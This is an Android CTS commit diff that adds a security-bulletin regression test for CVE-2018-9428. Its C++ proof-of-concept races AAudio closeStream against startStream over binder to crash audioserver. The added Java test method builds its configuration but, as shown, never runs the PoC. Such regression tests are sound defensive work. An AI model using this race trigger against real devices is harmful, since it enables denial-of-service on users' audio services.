[RESTRICT AUTOMERGE] CTS test for Android Security b/74122779 am: 971b86d83c am: 6c2734df6d

Original change: https://googleplex-android-review.googlesource.com/c/platform/cts/+/12683271

Change-Id: Ic44331e9484bbc2a92342ff6fbb997e6c20804ef

4 files changed, 120 insertions, 0 deletions

diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 8e8fac23eb9..9a5c29d911b 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -187,6 +187,7 @@
         <!--__________________-->
         <!-- Bulletin 2018-07 -->
         <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+        <option name="push" value="CVE-2018-9428->/data/local/tmp/CVE-2018-9428" />
         <option name="push" value="CVE-2018-9424->/data/local/tmp/CVE-2018-9424" />
 
         <!--__________________-->
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/Android.bp
new file mode 100644
index 00000000000..a4c4f0aa506
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/Android.bp
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2018-9428",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+    ],
+    shared_libs: [
+        "libmedia",
+        "libutils",
+        "libbinder",
+        "libaaudio_internal",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/poc.cpp
new file mode 100644
index 00000000000..cf21dbcc4da
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/poc.cpp
@@ -0,0 +1,78 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "binding/IAAudioService.h"
+#include <binder/IPCThreadState.h>
+#include <binder/IServiceManager.h>
+
+using namespace android;
+using namespace aaudio;
+
+typedef struct _thread_args {
+  aaudio_handle_t aaudioHandle;
+  sp<IAAudioService> aas;
+} thread_args;
+
+static void *closeStreamThread(void *arg) {
+  thread_args *threadArgs = (thread_args *)arg;
+  if (threadArgs) {
+    if (threadArgs->aas) {
+      threadArgs->aas->closeStream(threadArgs->aaudioHandle);
+    }
+  }
+  return nullptr;
+}
+
+static void *startStreamThread(void *arg) {
+  thread_args *threadArgs = (thread_args *)arg;
+  if (threadArgs) {
+    if (threadArgs->aas) {
+      threadArgs->aas->startStream(threadArgs->aaudioHandle);
+    }
+  }
+  return nullptr;
+}
+
+int main() {
+  thread_args targs;
+
+  sp<IServiceManager> sm = defaultServiceManager();
+  sp<IBinder> binder = sm->getService(String16("media.aaudio"));
+  targs.aas = interface_cast<IAAudioService>(binder);
+  if (!(targs.aas)) {
+    return EXIT_FAILURE;
+  }
+  aaudio::AAudioStreamRequest request;
+  request.getConfiguration().setSharingMode(AAUDIO_SHARING_MODE_SHARED);
+  request.getConfiguration().setDeviceId(0);
+  request.getConfiguration().setSampleRate(AAUDIO_UNSPECIFIED);
+
+  time_t currentTime = start_timer();
+  while (timer_active(currentTime)) {
+    pthread_t pt[2];
+
+    aaudio::AAudioStreamConfiguration configurationOutput;
+    targs.aaudioHandle = targs.aas->openStream(request, configurationOutput);
+    pthread_create(&pt[0], nullptr, closeStreamThread,
+                   &targs); /* close stream */
+    pthread_create(&pt[1], nullptr, startStreamThread,
+                   &targs); /* start stream */
+
+    sleep(5);
+  }
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index 11f36bc3a76..f62bc8fe2a0 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -45,6 +45,17 @@ public class TestMedia extends SecurityTestCase {
      ******************************************************************************/
 
     /**
+     * b/74122779
+     * Vulnerability Behaviour: SIGABRT in audioserver
+     */
+    @SecurityTest(minPatchLevel = "2018-07")
+    @Test
+    public void testPocCVE_2018_9428() throws Exception {
+        String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+        AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2018-9428", getDevice());
+    }
+
+    /**
      * b/64340921
      * Vulnerability Behaviour: SIGABRT in audioserver
      */